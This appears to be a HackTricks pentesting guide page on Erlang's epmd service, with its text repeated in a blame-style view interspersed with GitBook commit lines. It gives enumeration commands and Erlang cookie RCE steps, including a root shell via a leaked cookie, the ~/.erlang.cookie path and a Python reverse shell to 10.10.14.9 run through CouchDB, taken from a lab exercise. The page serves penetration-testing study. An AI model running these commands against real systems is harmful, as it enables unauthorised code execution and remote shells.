hacktricks/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md

# 4369 - Pentesting Erlang Port Mapper Daemon \(epmd\)

## Basic Info

The erlang port mapper daemon is used to coordinate distributed erlang instances. His job is to **keep track of which node name listens on which address**. Hence, epmd map symbolic node names to machine addresses.

**Default port**: 4369

```text
PORT     STATE SERVICE VERSION
4369/tcp open  epmd    Erlang Port Mapper Daemon
```

This is used by default on RabbitMQ and CouchDB installations.

## Enumeration

### Manual

```bash
echo -n -e "\x00\x01\x6e" | nc -vn <IP> 4369

#Via Erlang, Download package from here: https://www.erlang-solutions.com/resources/download.html
dpkg -i esl-erlang_23.0-1~ubuntu~xenial_amd64.deb
apt-get install erlang
erl #Once Erlang is installed this will promp an erlang terminal
1> net_adm:names('<HOST>'). #This will return the listen addresses
```

### Automatic

```bash
nmap -sV -Pn -n -T4 -p 4369 --script epmd-info <IP>

PORT     STATE SERVICE VERSION
4369/tcp open  epmd    Erlang Port Mapper Daemon
| epmd-info: 
|   epmd_port: 4369
|   nodes: 
|     bigcouch: 11502
|     freeswitch: 8031
|     ecallmgr: 11501
|     kazoo_apps: 11500
|_    kazoo-rabbitmq: 25672
```

## Erlang Cookie RCE

### Remote Connection

If you can **leak the Authentication cookie** you will be able to execute code on the host. Usually, this cookie is located in `~/.erlang.cookie` and is generated by erlang at the first start. If not modified or set manually it is a random string \[A:Z\] with a length of 20 characters.

```bash
greif@baldr ~$ erl -cookie YOURLEAKEDCOOKIE -name test2 -remsh test@target.fqdn
Erlang/OTP 19 [erts-8.1] [source] [64-bit] [async-threads:10]

Eshell V8.1 (abort with ^G)

At last, we can start an erlang shell on the remote system.

(test@target.fqdn)1>os:cmd("id").
"uid=0(root) gid=0(root) groups=0(root)\n"
```

More information in [https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/](https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/)  
The author also share a program to brutforce the cookie:

{% file src="../.gitbook/assets/epmd\_bf-0.1.tar.bz2" %}

### Local Connection

In this case we are going to abuse CouchDB to escalate privileges locally:

```bash
HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE 
(anonymous@canape)1> rpc:call('couchdb@localhost', os, cmd, [whoami]).
"homer\n"
(anonymous@canape)4> rpc:call('couchdb@localhost', os, cmd, ["python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.9\", 9005));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"]).
```

Example taken from [https://0xdf.gitlab.io/2018/09/15/htb-canape.html\#couchdb-execution](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution)  
You can use **Canape HTB machine to** **practice** how to **exploit this vuln**.

### Metasploit

```bash
#Metasploit can also exploit this if you know the cookie
msf5> use exploit/multi/misc/erlang_cookie_rce
```

## Shodan

* `port:4369 "at port"`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`# 4369 - Pentesting Erlang Port Mapper Daemon \(epmd\)`

			`## Basic Info`

			`The erlang port mapper daemon is used to coordinate distributed erlang instances. His job is to keep track of which node name listens on which address. Hence, epmd map symbolic node names to machine addresses.`

			`Default port: 4369`

			```text
			`PORT STATE SERVICE VERSION`
			`4369/tcp open epmd Erlang Port Mapper Daemon`
			```

GitBook: [master] one page modified 2020-07-16 18:27:18 +00:00			`This is used by default on RabbitMQ and CouchDB installations.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`## Enumeration`

			`### Manual`

			```bash
			`echo -n -e "\x00\x01\x6e" \| nc -vn <IP> 4369`

			`#Via Erlang, Download package from here: https://www.erlang-solutions.com/resources/download.html`
			`dpkg -i esl-erlang_23.0-1~ubuntu~xenial_amd64.deb`
			`apt-get install erlang`
			`erl #Once Erlang is installed this will promp an erlang terminal`
			`1> net_adm:names('<HOST>'). #This will return the listen addresses`
			```

			`### Automatic`

			```bash
			`nmap -sV -Pn -n -T4 -p 4369 --script epmd-info <IP>`

			`PORT STATE SERVICE VERSION`
			`4369/tcp open epmd Erlang Port Mapper Daemon`
			`\| epmd-info:`
			`\| epmd_port: 4369`
			`\| nodes:`
			`\| bigcouch: 11502`
			`\| freeswitch: 8031`
			`\| ecallmgr: 11501`
			`\| kazoo_apps: 11500`
			`\|_ kazoo-rabbitmq: 25672`
			```

GitBook: [master] 2 pages modified 2020-07-16 18:41:33 +00:00			`## Erlang Cookie RCE`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [master] 2 pages modified 2020-07-16 18:41:33 +00:00			`### Remote Connection`
GitBook: [master] one page modified 2020-07-16 18:26:18 +00:00
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			If you can leak the Authentication cookie you will be able to execute code on the host. Usually, this cookie is located in `~/.erlang.cookie` and is generated by erlang at the first start. If not modified or set manually it is a random string \[A:Z\] with a length of 20 characters.

			```bash
			`greif@baldr ~$ erl -cookie YOURLEAKEDCOOKIE -name test2 -remsh test@target.fqdn`
			`Erlang/OTP 19 [erts-8.1] [source] [64-bit] [async-threads:10]`

			`Eshell V8.1 (abort with ^G)`

			`At last, we can start an erlang shell on the remote system.`

			`(test@target.fqdn)1>os:cmd("id").`
			`"uid=0(root) gid=0(root) groups=0(root)\n"`
			```

			`More information in [https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/](https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/)`
			`The author also share a program to brutforce the cookie:`

			`{% file src="../.gitbook/assets/epmd\_bf-0.1.tar.bz2" %}`

GitBook: [master] 2 pages modified 2020-07-16 18:41:33 +00:00			`### Local Connection`
GitBook: [master] one page modified 2020-07-16 18:26:18 +00:00
			`In this case we are going to abuse CouchDB to escalate privileges locally:`

			```bash
			`HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE`
			`(anonymous@canape)1> rpc:call('couchdb@localhost', os, cmd, [whoami]).`
			`"homer\n"`
			`(anonymous@canape)4> rpc:call('couchdb@localhost', os, cmd, ["python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.9\", 9005));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"]).`
			```

GitBook: [master] 2 pages modified 2020-07-16 18:41:33 +00:00			`Example taken from [https://0xdf.gitlab.io/2018/09/15/htb-canape.html\#couchdb-execution](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution)`
			`You can use Canape HTB machine to practice how to exploit this vuln.`
GitBook: [master] one page modified 2020-07-16 18:26:18 +00:00
GitBook: [master] 2 pages modified 2020-07-16 18:41:33 +00:00			`### Metasploit`
GitBook: [master] one page modified 2020-07-16 18:26:18 +00:00
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`#Metasploit can also exploit this if you know the cookie`
			`msf5> use exploit/multi/misc/erlang_cookie_rce`
			```

GitBook: [master] 2 pages modified 2020-07-16 18:41:33 +00:00			`## Shodan`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			* `port:4369 "at port"`